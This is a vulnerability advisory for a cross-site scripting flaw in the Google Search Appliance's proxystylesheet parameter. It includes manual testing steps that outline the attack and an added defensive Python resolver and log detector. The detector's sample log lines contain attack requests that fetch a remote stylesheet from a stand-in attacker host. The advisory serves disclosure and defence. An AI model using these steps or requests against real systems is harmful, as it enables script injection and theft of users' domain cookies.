Google Search Appliance proxystylesheet XSLT XSS

2005-11-21T00:00:00
ID OSVDB:20980
Type osvdb
Reporter H D Moore (fdlist@digitaloffense.net)
Modified 2005-11-21T00:00:00

Description

Vulnerability Description

The Google Search Appliance contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the appliance fetches and applies a remote XSLT style sheet whose URL is supplied in the proxystylesheet request parameter, so an attacker controls the transform that produces the HTML returned to the browser. A specially crafted URL could therefore cause arbitrary script to execute in a user's browser within the trust relationship between the browser and the appliance (that is, in the appliance's origin), leading to a loss of integrity.

Solution Description

Upgrade to the version specified in Google advisory GA-2005-08-m, which has been reported to fix this vulnerability. An upgrade is required, as there are no known workarounds.

Short Description

The Google Search Appliance applies a remote XSLT style sheet named in the proxystylesheet parameter, allowing a remote attacker to craft a URL that executes arbitrary script in a user's browser within the appliance's trust relationship (cross-site scripting).

Manual Testing Notes

Create an XSLT style sheet that contains the malicious JavaScript code, replace the proxystylesheet parameter with the URL of this style sheet, and then supply that link to the target user. Because the script runs in the appliance's origin, this attack is particularly effective against domain-wide cookies when the appliance is given a hostname within that domain.
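
The following is an added example, not code from the advisory or from Google: it shows the hardened way to treat a stylesheet-selection parameter such as proxystylesheet (accept only a bare front-end name resolved inside a local store, never a URL), and a small detector that flags requests whose proxystylesheet value points at a remote style sheet, run over constructed access-log lines. The stylesheet directory, the front-end naming rule, the hostnames and the log format are all assumptions for the illustration and are not taken from the appliance.

```python
"""Added example (not the appliance's code): hardened handling of a
stylesheet-selection parameter like proxystylesheet, plus a detector for
requests that try to pull in a remote XSLT. Directory layout, naming rule,
hosts and log format are assumed, not documented by the advisory."""

import re
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Hypothetical local store of front-end style sheets (not the GSA's real layout).
STYLESHEET_DIR = Path("/opt/search/stylesheets")
# A front-end is selected by a bare name; anything else is not a style sheet name.
FRONTEND_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def is_remote_ref(value: str) -> bool:
    """True when a (URL-decoded) proxystylesheet value refers to something other
    than a local front-end: a URL with a scheme, a protocol-relative //host, or
    any path component. Bare front-end names return False."""
    v = value.strip()
    if urlsplit(v).scheme or v.startswith("//"):
        return True
    return any(c in v for c in "/\\") or v.startswith(".")


def resolve_stylesheet(value: str) -> Path:
    """Hardened selection: map a front-end name to a file inside STYLESHEET_DIR
    and refuse everything else, so an attacker-supplied transform is never
    fetched or applied to the appliance's own output."""
    if not FRONTEND_NAME.fullmatch(value):
        raise ValueError(f"proxystylesheet is not a front-end name: {value!r}")
    path = (STYLESHEET_DIR / f"{value}.xslt").resolve()
    if path.parent != STYLESHEET_DIR.resolve():  # belt-and-braces path check
        raise ValueError("style sheet resolved outside the store")
    return path


REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')


def scan_access_log(lines):
    """Flag requests whose proxystylesheet value is a remote or path reference.
    Returns (client, value) pairs. The log format is a constructed, Apache-style
    sample, not the appliance's real format."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)  # parse_qs percent-decodes
        for value in query.get("proxystylesheet", []):
            if is_remote_ref(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines for the demonstration.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Nov/2005:10:00:00 +0000] "GET /search?q=budget&proxystylesheet=default HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Nov/2005:10:00:03 +0000] "GET /search?q=budget&proxystylesheet=http://attacker.example/evil.xsl HTTP/1.1" 200 820',
    '10.0.0.9 - - [21/Nov/2005:10:00:07 +0000] "GET /search?q=budget&proxystylesheet=%2F%2Fattacker.example%2Fevil.xsl HTTP/1.1" 200 820',
    '10.0.0.7 - - [21/Nov/2005:10:00:09 +0000] "GET /search?q=budget HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, value in scan_access_log(SAMPLE_LOG):
        print(f"{client} requested remote style sheet {value}")
    print(resolve_stylesheet("default"))
```

The resolver rejects the parameter before any fetch happens, which is the property the vulnerable appliance lacked; the detector is the corresponding retrospective check for a fleet that has not yet been upgraded, and it decodes the query string first so a percent-encoded scheme or protocol-relative host is not missed.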

References:

Security Tracker: 1015246
Secunia Advisory ID: 17644
Related OSVDB ID: 20979
Related OSVDB ID: 20978
Related OSVDB ID: 20977
Related OSVDB ID: 20981
Other Advisory URL: http://metasploit.com/research/vulns/google_proxystylesheet/
News Article: http://www.techworld.com/networking/news/index.cfm?NewsID=4840
News Article: http://www.webpronews.com/insiderreports/searchinsider/wpn-49-20051122GoogleMiniNeededBigSecurityPatch.html
News Article: http://news.techwhack.com/2526/221129-google-fixes-security-flaws-in-google-mini/
News Article: http://www.eweek.com/article2/0,1895,1891796,00.asp
FrSIRT Advisory: ADV-2005-2500
CVE ID: CVE-2005-3758
Bugtraq ID: 15509